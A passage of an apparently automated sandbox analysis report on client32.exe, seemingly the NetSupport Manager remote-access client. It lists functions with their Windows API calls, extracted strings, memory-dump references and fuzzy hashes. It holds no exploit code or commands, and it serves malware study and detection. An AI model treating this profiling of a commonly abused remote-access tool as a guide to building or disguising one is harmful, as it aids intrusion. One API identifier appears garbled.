                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3085755443-3916222277
                                                                                                                                                                • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                                                                                                • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                                                                                                • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                                                                                                • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                                                                                                Function 1114D920 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 177COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1114DACC
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1114DAE1
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CritiusernitializeSection$Exception@8Throw__wcstoi64_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: TracePipe$TracePipeRecv$TracePipeRecvUI$TracePipeSend$TracePipeSendUI$TraceRecv$TraceSend$_debug
                                                                                                                                                                • API String ID: 2906687742-2018363409
                                                                                                                                                                • Opcode ID: c083690a5e1e9880a6ab3f9e2642703f398a8d4a618d0d436e8e73249eeeeae6
                                                                                                                                                                • Instruction ID: f2cf1ee30c1a9215aec081895272530a5bdc1272587a17d20c2ddc6b3b073753
                                                                                                                                                                • Opcode Fuzzy Hash: c083690a5e1e9880a6ab3f9e2642703f398a8d4a618d0d436e8e73249eeeeae6
                                                                                                                                                                • Instruction Fuzzy Hash: 1F51C5B5B04649AFDB50DF798C80BAFFAE8EB58604F61482EE556D3740D730A9018762
                                                                                                                                                                Function 110FF6C0 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 155threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • GetLastError.KERNEL32(Client,00000000,00000001,00000000,00000000,1105A92A,00000001,562258), ref: 110FF7C6
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110FF7FC
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110FF80A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentThread$ErrorLast__wcstoi64
                                                                                                                                                                • String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
                                                                                                                                                                • API String ID: 2021241812-3565238984
                                                                                                                                                                • Opcode ID: 41b2695d0c332991a5e502e9703662785986028cd3ea02404f3c4e4ca1a214cd
                                                                                                                                                                • Instruction ID: 191e3ee3254c54436d3d5a8a020f66c0c65dd820e8d0d15556bcb108cb59b559
                                                                                                                                                                • Opcode Fuzzy Hash: 41b2695d0c332991a5e502e9703662785986028cd3ea02404f3c4e4ca1a214cd
                                                                                                                                                                • Instruction Fuzzy Hash: A451D876E00216ABEB14DF65CC82FAEB7A5EF84718F14046DF915D7280E674A900C7A2
                                                                                                                                                                Function 11065580 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset_strncat_strncpy$_calloc
                                                                                                                                                                • String ID: Drivers$PrintCapture$Printer
                                                                                                                                                                • API String ID: 3453565913-1525524346
                                                                                                                                                                • Opcode ID: 7cd836b0e17dd7cb63b2ab5a14b362ebc1c395684dbd5d2e1ffba9791d023d94
                                                                                                                                                                • Instruction ID: 172f0c2617bfc64fa6342e132d6ab688b54b8d91c339fc0d2da86cc62e1bb8b7
                                                                                                                                                                • Opcode Fuzzy Hash: 7cd836b0e17dd7cb63b2ab5a14b362ebc1c395684dbd5d2e1ffba9791d023d94
                                                                                                                                                                • Instruction Fuzzy Hash: 96412B75B002156FD711CB64EC14FEABBED9F85348F0440D4F9489B282E6B2AE14C791
                                                                                                                                                                Function 1105D900 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 126sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • wsprintfA.USER32 ref: 1105D96E
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1105D9B8
                                                                                                                                                                • WaitForInputIdle.USER32(?,00001388), ref: 1105D9CD
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 1105DA01
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FolderPath$CloseFileHandleIdleInputModuleNameSleepWaitwsprintf
                                                                                                                                                                • String ID: %s%s$Cobrowse FindWindow ret %x$Cobrowse WaitForInputIdle ret %x$NSMCobrMain$NSMCobrProxy$client32.exe /cobrowse
                                                                                                                                                                • API String ID: 1983868302-3988794623
                                                                                                                                                                • Opcode ID: 3b1aaaaa0c5922aa4f6bc2fea3c80576ea5bd589def0aaa2b8293e7e1972bfa4
                                                                                                                                                                • Instruction ID: 82b3edcd83601c167001e6aa3d0997afc3f54d4d4a7b343ab0a8b74466ef4d24
                                                                                                                                                                • Opcode Fuzzy Hash: 3b1aaaaa0c5922aa4f6bc2fea3c80576ea5bd589def0aaa2b8293e7e1972bfa4
                                                                                                                                                                • Instruction Fuzzy Hash: A741B274E44309AFDB60DF64CC45FEEB7F5AB08B08F004599E919A7680DA70A940CB61
                                                                                                                                                                Function 11015660 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 123registrytimeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 11015678
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110156D4
                                                                                                                                                                • RegisterClassA.USER32(00000003), ref: 110156EE
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • CreateWindowExA.USER32(00000008,NSMIdentifyWnd,?,90000000,?,?,?,?,00000000,00000000,00000000), ref: 1101574F
                                                                                                                                                                • UpdateWindow.USER32(00000000), ref: 1101579D
                                                                                                                                                                • SetTimer.USER32(00000000,00000001,?,00000000), ref: 110157D0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Windowwsprintf$ClassCreateCursorErrorExitLastLoadMessageProcessRegisterTimerUpdate
                                                                                                                                                                • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1905683801-3620323974
                                                                                                                                                                • Opcode ID: 23e57b657c81a1d420a96cede1f443d69ad6ecae00286fd139198529a744739a
                                                                                                                                                                • Instruction ID: 61e1f5e60b3a4d6c52097a453ca3e1184f1617b919ecbaf4286c0b104a5e04a4
                                                                                                                                                                • Opcode Fuzzy Hash: 23e57b657c81a1d420a96cede1f443d69ad6ecae00286fd139198529a744739a
                                                                                                                                                                • Instruction Fuzzy Hash: A44161B5E00209AFD710CFA5CC85BDEFBF8BB48304F10856AE529E7644E775A540CB91
                                                                                                                                                                Function 110276A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000000), ref: 110276BF
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 110276C6
                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?,?,00000000), ref: 110276E8
                                                                                                                                                                • _malloc.LIBCMT ref: 110276EE
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027708
                                                                                                                                                                • LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027729
                                                                                                                                                                • _free.LIBCMT ref: 11027754
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,1102FA1C), ref: 11027766
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentHandleHeapLookupNameOpenPrivilege_free_malloc
                                                                                                                                                                • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
                                                                                                                                                                • API String ID: 2190874299-3275751932
                                                                                                                                                                • Opcode ID: 0271db90772607bb65eaa6d9bb4202db7e906805055f1da97c36a874af3719c6
                                                                                                                                                                • Instruction ID: 7efe3961d46ca3303e5913aa27d02a5643f2587f40a0b85f69ee505bdaa5acf5
                                                                                                                                                                • Opcode Fuzzy Hash: 0271db90772607bb65eaa6d9bb4202db7e906805055f1da97c36a874af3719c6
                                                                                                                                                                • Instruction Fuzzy Hash: DB2171B5E00219ABDB10DFE4CC84EAFBBBCEF44718F144129E915A7244D771B906CBA1
                                                                                                                                                                Function 1106F060 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 1106F397
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                                                                                • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                                                                                                • API String ID: 3005300677-3496508882
                                                                                                                                                                • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                                                                                                • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                                                                                                • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                                                                                                • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                                                                                                Function 1103B430 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 184COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B497
                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 1103B4BE
                                                                                                                                                                  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                                                                                • _fgets.LIBCMT ref: 1103B55F
                                                                                                                                                                • _free.LIBCMT ref: 1103B5C6
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1103B69C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
